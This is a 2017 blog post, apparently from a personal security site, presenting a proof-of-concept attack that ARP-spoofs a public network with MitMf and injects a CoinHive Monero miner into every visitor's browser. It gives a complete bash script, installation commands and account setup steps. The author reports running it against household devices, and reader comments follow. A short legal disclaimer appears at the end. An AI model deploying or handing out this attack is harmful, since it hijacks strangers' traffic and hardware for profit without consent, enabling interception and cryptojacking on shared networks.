General, Info Sec 10-October-2017 .NetRussell 5 comments

Miner In the Middle


So not to long ago I read an article that TPB was running a JS miner in visitor’s browsers when they visit to generate some extra cash. I thought it was a pretty novel idea. Why not, I’d rather give up a little CPU power instead of looking at obnoxious ads.

Then I got to thinking… I wonder how hard it would be to inject a javascript miner into a public network.

A few weeks back I started playing around with MitMf Man In the Middle Framework . Originally my goal was to inject beef hooks and eventually get a shell. I realized though that this was a futile attempt these days, so I moved on. Then I saw this javascript payload that mines monero for you and I got to thinking. It would be pretty easy to drop onto a public network, arpspoof everyone and inject a javascript miner into their browser. So I started working on the attack. I’m happy to say that I was able to proof this and here is a PoC 😀

tldr; here’s the script


Setting up The Attack:

Before you can launch your mining assault you need to first

  1. Get a monero wallet
  2. Get a CoinHive account 

Once you have your CoinHive account, navigate to settings and put your monero wallet payout address into the site. That way they can pay you your funds 😀

You’ll also need to get an API key from the site. This is also under the settings page.

You’re also going to need to install the MitMf and Twisted 15.5.0if you’re running Kali. You can either install these by hand or you can run the script I built.

To install manually:

apt-get update;

apt-get install mitmf

pip install Twisted==15.5.0

How the Attack Works:

The attack is pretty simple actually. Your attacking machine needs to connect to a network with people surfing the web on it. Once connected, you run the script I provided above. The script will create an html file that has the javascript monero miner in it and it will also link your api key into it. Once the file is built, it launches the MitMf application.

The MitMf application, once running, will first arp poison the network and tell everyone to route traffic through your machine. Next it will listen for HTTP responses. When it sees one, it will inject our payload into it. Finally the victim will execute the payload automatically, without prompt, and start mining monero for you.

That’s it!

I attempted this attack on my home network and within about 30 seconds I had 3 machines and my girlfriends phone mining monero for me lol

For the skeptics that are afraid to download the script here’s the code. It’s pretty straight forward


if [ $# -eq “3” ]     then

apt-get update -y

apt-get install mitmf -y

pip install Twisted==15.5.0

echo “<script src=””></script><script>var miner = new      CoinHive.Anonymous(‘”$1″‘);miner.start();</script>” > /root/.miner_itm.html

mitmf –inject –html-file /root/.miner_itm.html –spoof –arp –gateway $2 -i $3


echo “./ <coinhive api key> <gateway ip> <interface name>”




Now obviously it is ILLEGAL to mine on someone’s machine without their expressed permission. Also, remember that mining reduces the shelf life of your hardware. Devices weren’t designed to run at 100% for days weeks or months at a time. I just wanted to demo this fun little attack that I think we’ll see more of in the future.

If you have any questions or info on how to clean this up, please reach out to me on twitter


5 thoughts on “Miner In the Middle

  1. I want to try this out on my home network but dont want to hose my home machines. Is it easy to cleanup/stop once it gets going?

    1. Yes, once the victim is infected, all you have to do is close the browser. The payloads should get cleaned up naturally.

  2. Wow, very interesting stuff 🙂
    I have 2 questions: how can one detect if his machine is infected and how can attacker see number of infected machines working for him?

Leave a Reply

Your email address will not be published. Required fields are marked *